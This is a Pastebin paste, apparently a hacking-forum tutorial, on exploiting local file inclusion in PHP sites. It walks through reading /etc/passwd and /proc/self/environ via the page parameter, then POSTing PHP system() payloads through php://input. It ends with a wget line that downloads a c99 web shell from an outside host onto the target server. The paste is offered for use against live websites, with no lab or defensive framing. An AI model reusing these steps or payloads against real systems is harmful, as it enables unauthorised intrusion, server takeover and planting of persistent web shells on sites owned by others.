API tools faq
paste
Advertisement
Kyfx

How to Shell LFI Sites Exploit <3

Kyfx
Jul 3rd, 2015
559
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
raw download clone embed print report
  1. Code:
  2. http://www.site.com/index.php?page=
  3.  
  4. You can have anything similar to that as long as you can be able to read files and obtain an "include" error.
  5.  
  6. First things first, give it a shot and see if you can read "/etc/passwd"
  7.  
  8. URL will look like:
  9.  
  10. Code:
  11.  
  12. Code:
  13. http://www.site.com/index.php?page=/etc/passwd
  14.  
  15. If successful, you'll be having a page that looks like this:
  16. [Image: AGx7w.png]
  17.  
  18. Now lets try reading:
  19.  
  20. Code:
  21.  
  22. Code:
  23. /proc/self/environ
  24. /proc/self/fd
  25.  
  26. So URL will become:
  27.  
  28. Code:
  29.  
  30. Code:
  31. http://www.site.com/index.php?page=/proc/self/environ
  32. http://www.site.com/index.php?page=/proc/self/fd
  33.  
  34. Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
  35. [Image: E4Ri0.png]
  36.  
  37. Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
  38. This can be done using the "Hackbar" or by using "Live HTTP headers"
  39.  
  40. I'll show you how to exploit via php://input using the "Hackbar"
  41.  
  42. So lets check what we're supposed to use in the Hackbar
  43.  
  44.  
  45. [Image: NC62R.png]
  46.  
  47. Now let's try putting this method in action.
  48. Look at the picture carefully.
  49. [Image: vMZKf.png]
  50.  
  51. URL will be:
  52.  
  53. Code:
  54.  
  55. Code:
  56. http://www.site.com/index.php?page=php://input
  57.  
  58. and POST DATA:
  59.  
  60. Code:
  61.  
  62. Code:
  63. <? system('uname -a'); ?>
  64.  
  65. Other commands:
  66.  
  67. List directories
  68.  
  69. Code:
  70.  
  71. Code:
  72. <? system('ls'); ?>
  73.  
  74. Identification
  75.  
  76. Code:
  77.  
  78. Code:
  79. <? system('id'); ?>
  80.  
  81. Convert format
  82.  
  83. Code:
  84.  
  85. Code:
  86. <? system('mv file.txt file.php'); ?>
  87.  
  88. Alright, let's spawn a shell there now shall we.
  89.  
  90. Grab a shell from sh3ll.org or anywhere else.
  91. For now, we'll be using the normal c99 shell
  92.  
  93. Code:
  94.  
  95. Code:
  96. http://www.sh3ll.org/c99.txt?
  97.  
  98.  
  99. Let's use the "wget" command to spawn our shell on the site.
  100.  
  101. So our POST DATA will be:
  102.  
  103. Code:
  104.  
  105. Code:
  106. <? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
  107.  
  108. This is how it's gonna look like.
  109. [Image: qlJRO.png]
  110.  
  111. Now that you've spawn a shell, you can now navigate to your shell on the site.
  112.  
  113. Code:
  114.  
  115. Code:
  116. http://www.site.com/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!